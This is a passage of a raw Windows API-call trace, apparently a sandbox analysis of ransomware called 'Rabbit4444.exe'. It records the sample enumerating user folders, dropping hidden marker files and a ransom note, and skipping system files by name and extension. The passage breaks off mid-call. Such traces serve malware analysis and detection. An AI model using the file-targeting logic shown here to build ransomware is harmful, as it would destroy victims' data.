lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.599] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.599] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.599] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.599] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa2bc7808, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xa2bc7808, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee083ca6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.599] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.599] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.599] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.599] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.599] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.600] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee083ca6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee083ca6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.600] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.600] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.600] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee083ca6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee083ca6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.600] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0061.600] lstrcpyW (in: lpString1=0x11cec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.600] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Cm\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\network\\connections\\cm\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.600] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.600] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.600] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.601] CloseHandle (hObject=0x29c) returned 1 [0061.601] CloseHandle (hObject=0x2a0) returned 1 [0061.601] GetCurrentThreadId () returned 0x2d4 [0061.601] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1220a8 [0061.601] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0061.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0061.601] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.601] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0061.601] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\" [0061.601] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" [0061.601] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.602] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.605] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.606] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.606] CloseHandle (hObject=0x2a0) returned 1 [0061.607] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 60 [0061.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.607] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3c8d333, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0061.607] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.607] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.607] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.607] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.607] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3c8d333, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.607] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.607] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.607] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.607] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.607] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.607] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee0a9df2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee0a9df2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0a9df2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.607] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.607] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.607] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ce02fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="Rabbit4444.exe") returned -1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2=".") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="..") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="windows") returned -1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="bootmgr") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="pagefile.sys") returned 1 [0061.607] lstrcmpiW (lpString1="Quick Launch", lpString2="boot") returned 1 [0061.608] lstrcmpiW (lpString1="Quick Launch", lpString2="ids.txt") returned 1 [0061.608] lstrcmpiW (lpString1="Quick Launch", lpString2="NTUSER.DAT") returned 1 [0061.608] lstrcpyW (in: lpString1=0x11cec02, lpString2="Quick Launch" | out: lpString1="Quick Launch") returned="Quick Launch" [0061.608] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", dwFileAttributes=0x10) returned 1 [0061.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x94) returned 0x113b98 [0061.608] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1220a8 | out: ListHead=0x1220c8, ListEntry=0x1220a8) returned 0x1221a8 [0061.608] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ce02fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xf6600cb, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0061.608] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.608] lstrcpyW (in: lpString1=0x11cec02, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.608] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.610] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.610] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.610] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.610] CloseHandle (hObject=0x29c) returned 1 [0061.610] CloseHandle (hObject=0x2a0) returned 1 [0061.610] GetCurrentThreadId () returned 0x2d4 [0061.610] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1220a8 [0061.610] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0061.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x113b98 | out: hHeap=0xe0000) returned 1 [0061.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0061.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0061.610] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\" [0061.610] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" [0061.610] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.613] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.616] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.617] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.617] CloseHandle (hObject=0x2a0) returned 1 [0061.620] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 73 [0061.620] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.620] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ce02fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0d0116, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0061.620] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.620] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.620] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.620] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.620] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3ce02fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee0d0116, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.620] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.620] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.620] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.620] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.620] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.620] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee0d0116, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee0d0116, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0d0116, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.620] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.620] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.620] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21f770e1, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc8e8141c, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc8e8141c, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x94, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0061.620] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.620] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.620] lstrcmpiW (lpString1="desktop.ini", lpString2="Rabbit4444.exe") returned -1 [0061.620] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0061.621] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0061.621] lstrcpyW (in: lpString1=0x11cec1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0061.621] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x22) returned 1 [0061.622] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini", dwFileAttributes=0x6) returned 1 [0061.622] lstrlenW (lpString="desktop.ini") returned 11 [0061.622] lstrlenW (lpString="Rabbit4444") returned 10 [0061.622] lstrcmpiW (lpString1="esktop.ini", lpString2="Rabbit4444") returned -1 [0061.622] lstrlenW (lpString=".dll") returned 4 [0061.622] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0061.622] lstrlenW (lpString=".lnk") returned 4 [0061.622] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0061.622] lstrlenW (lpString=".ini") returned 4 [0061.622] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0061.622] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d67afb, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x61d67afb, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x61d67afb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shows Desktop.lnk", cAlternateFileName="")) returned 1 [0061.622] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.622] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.622] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="Rabbit4444.exe") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2=".") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="..") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="windows") returned -1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="bootmgr") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="pagefile.sys") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="boot") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="ids.txt") returned 1 [0061.623] lstrcmpiW (lpString1="Shows Desktop.lnk", lpString2="NTUSER.DAT") returned 1 [0061.623] lstrcpyW (in: lpString1=0x11cec1c, lpString2="Shows Desktop.lnk" | out: lpString1="Shows Desktop.lnk") returned="Shows Desktop.lnk" [0061.623] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk", dwFileAttributes=0x0) returned 1 [0061.624] lstrlenW (lpString="Shows Desktop.lnk") returned 17 [0061.624] lstrlenW (lpString="Rabbit4444") returned 10 [0061.624] lstrcmpiW (lpString1="esktop.lnk", lpString2="Rabbit4444") returned -1 [0061.624] lstrlenW (lpString=".dll") returned 4 [0061.624] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0061.624] lstrlenW (lpString=".lnk") returned 4 [0061.624] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0061.624] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d8dd66, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x61d8dd66, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="")) returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="Rabbit4444.exe") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2=".") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="..") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="windows") returned -1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="bootmgr") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="pagefile.sys") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="boot") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="ids.txt") returned 1 [0061.624] lstrcmpiW (lpString1="Window Switcher.lnk", lpString2="NTUSER.DAT") returned 1 [0061.624] lstrcpyW (in: lpString1=0x11cec1c, lpString2="Window Switcher.lnk" | out: lpString1="Window Switcher.lnk") returned="Window Switcher.lnk" [0061.624] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Window Switcher.lnk", dwFileAttributes=0x0) returned 1 [0061.625] lstrlenW (lpString="Window Switcher.lnk") returned 19 [0061.625] lstrlenW (lpString="Rabbit4444") returned 10 [0061.625] lstrcmpiW (lpString1="itcher.lnk", lpString2="Rabbit4444") returned -1 [0061.625] lstrlenW (lpString=".dll") returned 4 [0061.625] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0061.625] lstrlenW (lpString=".lnk") returned 4 [0061.625] lstrcmpiW (lpString1=".lnk", lpString2=".lnk") returned 0 [0061.625] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61d8dd66, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x61d8dd66, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x61d8dd66, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x14e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Window Switcher.lnk", cAlternateFileName="")) returned 0 [0061.625] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0061.625] lstrcpyW (in: lpString1=0x11cec1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.625] CreateFileW 